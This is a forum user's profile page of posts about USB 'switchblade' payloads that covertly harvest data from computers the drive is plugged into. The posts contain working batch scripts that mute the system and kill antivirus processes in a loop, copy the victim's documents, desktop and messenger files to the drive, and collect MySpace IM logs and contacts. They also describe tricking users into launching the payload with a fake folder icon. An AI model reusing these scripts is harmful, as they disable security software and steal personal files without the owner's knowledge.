Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Recent Profile Visitors

1,757 profile views

Abigwar's Achievements


Newbie (1/14)

  1. LOL man, nah, That is what we refered to the underground scene back then. HPAV. Hacking/Phreaking/Anarchy/Virii/Cracking(or)Carding Holy crap, Maybe I am old. :o
  2. Maybe I am showing my age here, but I have been involved in the underground since before the internet. Does anyone else remember when hacking was still exploration and cracking was just breaking copy protection on software? Does anyone here remember h/p/a/v/c? Ah, the good old days of txt files and three letter affiliations. lol
  3. Google John The Ripper, and I respectfully disagree. Such is the nature of community development. It benefits us all. You're just behind the learning curve. You'll catch up...
  4. Even if auto-run is disabled, simply double clicking the U3 drive from my computer will launch it. Still can use the old method too, if you're so inclined, and trick people into launching by using the folder icon and dialog for the Open Folder to View Files popup.
  5. Guys, I don't know if anyone else did this, but i solved the no disk error on my all my test machines by simply removing A: and B: from the drive testing part of the script. Your getting that error when it tries to scan a floppy drive for the config file. A: and B: tend to be the floppies on most systems. I have no more issues with it.
  6. No offense man, but it doesn't look any diffrent than most other switchblades. What I did notice is that you made a work around for the firefox password grabber. I didn't test it, but it looks good. Is part of the package missing or am I totally overlooking something?
  7. Sorry Jen, I am not familiar with it, I will google eset now. Also, I was looking at old posts and now realize this isn't exactly a new idea. Can anyone tell me why it was never developed and implemented?
  8. Ok guys, We all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AV's before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife. What I decided to try, was using Nircmd's processkill command to elminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AV's such as Avast, we would want to make sure we mute the system speakers. (Note, We would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED"). Anyway, if a certain AV alerts to the attempt to kill it's process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out with out immediete detection. I tested this on AVG and it worked flawless and silently. ::Abigwar's First Attempt at Batch AVkiller ::Mute the system volume, in case of audible AV Alerts (Avast!) nircmd mutesysvolume 1 ::Kill AVG Command Center nircmd killprocess avgcc.exe ::Kill other AVG Processes nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe ::Restore system volume at end of switchblade nircmd mutesysvolume 0 Now what I would like to ask from all of you, is to look at your system processes and lets make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicitable processes. We also need to see how each AV reacts to the attempt to kill it's processes. One other thing I was considering, that if an AV's process is persistant, we could loop the batch file to continue to run, and kill the process over and over. How that could work, is we would call the seperate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switch blade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end. ::Theoretical Loop batch :Start nircmd killprocess avgcc.exe nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe IF EXIST SWITCHDONE.TXT GOTO END GOTO START :END delete switchdone.txt
  9. Ok! So I tested the Nircmd processkill to kill AVG Antivirus and it worked flawlessly and silently. I'm going to start a new thread to see if we can develop a list of processes used by AV's.
  10. I was thinking about something... We all know AVKill never works anymore because every AV catches it right away. So... Has anyone tried using nircmd's killprocess to shutdown AV's? If it works, we could create a list of AV processes and then use nircmd to try and shut them ALL down, whether they are installed in that machine or not. The downside, I suppose, would be if the virus scanner alerts that it's processes are being killed, however, what is the difference if the AV is alerting it is seeing infected files on the flashdrive anyway. If for stealth purposes you want to make sure the av is still running after the payload we could force a reboot. Something along the lines of: nircmd killprocess avg.exe What do you all think?
  11. Sorry, I take it back, I missed the FOR command. Ignore my last post. I will test the script in the morning and report back.
  12. I see some issues with your code. Most noteably, other than some scripting that won't work, there is no way to extract the contents of wanted.txt for the batch to know what file extensions are listed in it. :: By DMilton for free community :: Thread http://hak5.org/forums/index.php?showtopic=6746 :: Checks the state of Slurp3.cfg IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3 ::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simply to implement too. :: Detection of ENGLISH OS IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" ( set MyD=My Documents set Dsk=Desktop set ShDsk=Shared Desktop set ShDoc=Shared Documents set MSN=My Received Files echo The Operating System language is ENGLISH>> %log% 2>&1 ) :: Detection of SPANISH OS (After chinese, the second used language in the world);) IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" ( set MyD=Mis Documentos set Dsk=Escritorio set ShDsk=Escritorio Compartido set ShDoc=Documentos Compartidos set MSN=Mis Archivos Recibidos echo The Operating System language is SPANISH>> %log% 2>&1 ) :: Sets other variables and paths to clean up pathnams later on set SlurpDir=%logdir%\Slurp_Data set Wanted=%config%\wanted.txt :: Creates the directory structure for the wanted doc option if not exists IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\" IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\" IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\" IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\" IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\" :: Copying the files with the same structure than original for /F %%a in (%wanted%) do ( xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C ) ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Wanted files were copied] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 pause :SkipSlurp3
  13. Wow! That is a nicely crafted batch file. Good work! I added this to the initial :slurp. Pulls contact lists, logs, saved convo's and offline messages for Myspace IM. Have a few other ideas I will implement on my own drive when I get time. Maybe I'll come back and post them. :: Myspace IM mkdir %logdir%\Slurp_Data\Myspace fc.exe "%APPDATA%\Myspace\IM\Conversations\*" "%logdir%\Slurp_Data\Myspace\*" /i /o xcopy "%APPDATA%\MySpace\IM\Logs\*.log" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y xcopy "%APPDATA%\MySpace\IM\ContactCache\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y xcopy "%APPDATA%\MySpace\IM\Download\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
  • Create New...